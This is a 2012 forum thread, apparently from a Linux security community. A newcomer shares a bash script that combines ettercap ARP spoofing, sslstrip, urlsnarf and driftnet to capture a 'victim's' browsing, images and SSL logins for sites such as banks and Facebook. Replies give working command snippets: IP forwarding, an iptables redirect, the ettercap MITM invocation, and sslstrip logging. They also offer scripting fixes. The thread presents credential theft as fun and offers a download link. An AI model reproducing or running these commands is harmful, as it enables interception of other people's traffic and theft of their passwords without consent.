Author Topic: Just finished my new script with SSL Password stealing, URLsnarf, Dsniff...etc  (Read 6331 times)

n1tr0g3n_0x1d3

  • Newbie
  • *
  • Posts: 48
  • n1tr0g3n
    • View Profile
    • n1tr0g3n's Network Security Blog
For some people it would be super simple". Though it’s not a huge script but I learned alot writing it and had to get the commands exact that worked and wouldn’t kill my network..etc I hope you guys like it and please leave any comments or suggestions as it will help me in building scripts later on  : )

Please take it easy on me I'm new to scripting and wan't to keep learning and any help is appreciated on how to make it better.

This script does quite a few things with only like 3 commands in total needed by the user. It opens Dsniff to capture the users images from the pages they are browsing on in real time and saves it to a folder on your desktop named images which the script creates., URLSnarf to show web pages the victim is opening in their browser, SSLStrip to capture SSL logins such as banking sites, youtube, Facebook..etc And also opens Ettercap to do the MITM. I made this for Backbox  ;).



Ok enough BS lets run the script and have some fun!!!  

Download:   https://www.onlinefilefolder.com/4shRaMgId4XGpL
First fix permissions on the file like normal

chmod + x n1tr0g3n_SSL.sh

then type the command below

./n1tr0g3n_SSL.sh            â€”——-> You could also type ./n1t + the tab key twice   ”it will type it all out for you.”

Once it opens it will ask you to press enter to continue and ask for the name of your interface such as  eth0, eth1, wlan0…etc
after that it will do everything on its own and open a few xterm windows. Just drag the windows on your screen so you can see them all arranged nicely and watch the images, URL’s and passwords come rolling in. To close the script just hit CTRL + C on the open windows.

Hope you guys like it and all comments are welcome and if you have any problems I will try my best to help
« Last Edit: August 13, 2012, 12:43:24 PM by n1tr0g3n_0x1d3 »




n1tr0g3n_0x1d3

  • Newbie
  • *
  • Posts: 48
  • n1tr0g3n
    • View Profile
    • n1tr0g3n's Network Security Blog
Sorry about that, I meant to put a + but the _ came out, I 'll change it now. thanks for noticing that Luke..



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Quote
I made this for Backbox
are you sure??
mkdir /root/Desktop/images
mkdir: impossibile creare la directory "/root/Desktop/images": File o directory non esistente

bbox has users home, why did you made this path? there are a lot of other trouble but this is the most important for compatibility...
« Last Edit: August 12, 2012, 07:19:53 PM by weVeg »

una voce libera è sempre liberatrice
under_r00t


r083rt

  • Guest
Quote
it’s one of my most technical scripts I’ve written
hmm a comedian ehh .....  leave the joke's to me  :P Ill do the funny stuff around here

please fix your script with the below snippet

Code: [Select]
mkdir $HOME/Desktop/images
echo "1" | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT  --to-port 10000
sudo xterm -e ettercap -TqM arp:oneway,remote // // -i $IFACE
sudo xterm -e sslstrip -k -f -l 10000 2> /dev/null

while this is really basic and not doing much I wont knock you for trying

BUT when your writing script,coding or writing a program .. you MUST treat the end  user as if there
completely thick and they have not got a clue , that way you will always make the syntax user friendly

example you have set IP forwarding in your script you haven't set a trap or even told the user that
they must disable forwarding when there finished or added  an automatic disable feature to it

EXAMPLE
Code: [Select]
trap "echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward ;sudo pkill sslstrip " EXIT

also you should add a table flush rule to that as well

As I said you are trying but you can cause the user more problems if you don't write the script properly

EXAMPLE : you have not added a key press to force the user to quit ettercap so the network is not doS'ed and cause disruption on the network THAT IN itself is a major F**k-up

if you are thinking to your self but hey were hackers, if you don't know what the script does or what to do you shouldn't be using it

WELL YOUR WRONG !!!!!!

like any OS, or tool it must be user friendly and the arguments MUST be completed within the script,code or program



« Last Edit: August 12, 2012, 11:41:09 PM by r083rt »



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Quote
sudo mkdir $HOME/Desktop/images
different language have different path( example i have $HOME/Scrivania/ ), you can save the path inside a var and let the users change it, or you can use "-p" option that generate /Desktop and /images folder if doesn't exist, or you can use $? error to report the issue (indeed i don't see any error managing), again you can tell users to run the script on Desktop, and with "pwd" save the right path .... then if you have already installed tool why update and install every time you run the script? you can use "which" to see if they are installed!
« Last Edit: August 12, 2012, 11:35:21 PM by weVeg »

una voce libera è sempre liberatrice
under_r00t


r083rt

  • Guest
true !!! or do  as weveg said let the user select where to store the images

or force it  :)
Code: [Select]
if [[ $EUID -ne 0 ]]; then
cd /home/*;mkdir Desktop/images
else
mkdir Desktop/images
fi
« Last Edit: August 12, 2012, 11:55:27 PM by r083rt »



n1tr0g3n_0x1d3

  • Newbie
  • *
  • Posts: 48
  • n1tr0g3n
    • View Profile
    • n1tr0g3n's Network Security Blog
Thanks guys! I'm by no the king of scripting or claim to be that's why I said it was "My" most technical script. I know some of you guys know scripting in and out and the chance of me getting hung in a tree posting my script up was pretty high. I appreciate the help and some of what you guys said was way over my head since I am learning on my own and have no type of programming knowledge. Kind of wish I didn't post it up now  ;)  I've been up over 20 hours now and got my whooping from everyone now it's time to hit the bed lol If someone could re write the script for me with the corrections I would appreciate it and look over it to figure out what your added commands do and so forth so. That would really make my day to see the script kind of evolve and understand the advanced commands you guys could throw into it and make it more functional  :)


Oh and the directory I specified places the folder on the desktop so I don't see anything wrong with how I wrote it?? is there a reason I wouldn't want to use that path?
« Last Edit: August 13, 2012, 12:44:38 PM by n1tr0g3n_0x1d3 »



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Quote
Oh and the directory I specified places the folder on the desktop so I don't see anything wrong with how I wrote it?? is there a reason I wouldn't want to use that path?
yes! 'cause english version has $HOME/Desktop, italian version has $HOME/Scrivania and any other language have different path! for this reason you should let the users select their own path! use something like:
Code: [Select]
path=`pwd`
and tell users to run the script on Desktop ! read my and robert suggestions above! Or built your own working path, for example: mkdir $HOME/n1tr0_image_tmp and save all data inside that folder!
We can write this script for you, but you'll learn nothing, you spend lot of energy to echo your name, but the rest of script is simpler than your name! try to use function and some conditional jump (if then else fi, case esac )
« Last Edit: August 13, 2012, 03:28:34 PM by weVeg »

una voce libera è sempre liberatrice
under_r00t


nubbix

  • Newbie
  • *
  • Posts: 30
    • View Profile
You might also want to opt the possibility of letting the user choose where to save images, you could define such user input in the beginning of the sctript ;)



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Hi nitrogen, i've written this "n1tro_test.sh" [ 0 ] , i don't know if it works, but should give you  some idea.... just to show you... i hope which you appreciate that!

[ 0 ] http://pastebin.com/bh1gGZS6
« Last Edit: August 13, 2012, 07:17:43 PM by weVeg »

una voce libera è sempre liberatrice
under_r00t


n1tr0g3n_0x1d3

  • Newbie
  • *
  • Posts: 48
  • n1tr0g3n
    • View Profile
    • n1tr0g3n's Network Security Blog
WOW thanks a ton guys for your tips and insight as they are helping me tremendously & I am also looking over the script that weVeg re wrote and trying to see exactly whats going on by the commands he issued. I learn very visually and when I can look at the script now and see what changes you made and I know exactly what the script was made to do since I initially put the "half @ss  ;)" script together my self it makes all you commands stick out as to their function in the script. I really appreciate every ones help and am blessed to have such talented people willing to share their knowledge and help me grow. Thanks again guys I'm going to see what I can do with it now   :)



weVeg

  • Hero Member
  • *****
  • Posts: 737
    • View Profile
Another way to check dependence:
Code: [Select]
#!/bin/bash

depend=( sslstrip ettercap dsniff driftnet urlsnarf loller ) ;

for t in ${!depend[@]}
do
which ${depend[t]} > /dev/null || echo "${depend[t]} : not installed"
done

una voce libera è sempre liberatrice
under_r00t


thisismyname

  • Newbie
  • *
  • Posts: 4
    • View Profile
Or just put the Depends in the debian/control file where they belong for a debain package. Just a suggestion
http://www.debian.org/doc/manuals/maint-guide/dreq.en.html#control
Hope that this opens a rabbit hole for you. (good rabbit hole that is)